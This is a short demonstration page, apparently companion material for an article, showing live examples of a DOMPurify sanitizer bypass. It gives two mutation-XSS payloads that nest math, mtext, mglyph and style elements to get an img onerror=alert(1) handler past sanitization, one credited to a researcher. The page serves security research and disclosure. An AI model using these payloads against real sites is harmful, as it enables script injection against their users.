DOMPurify bypass

Live examples for an excellent article.

Editable input:

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Input is harmless :

Alerts when sanitized :

In <iframe> with :

And with :

Note: Chrome 86 parses content differently in <iframe>.

Check out the sample by Sapra @pwntheweb (the one in the article contains an error; it is fixed here):

<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(1)>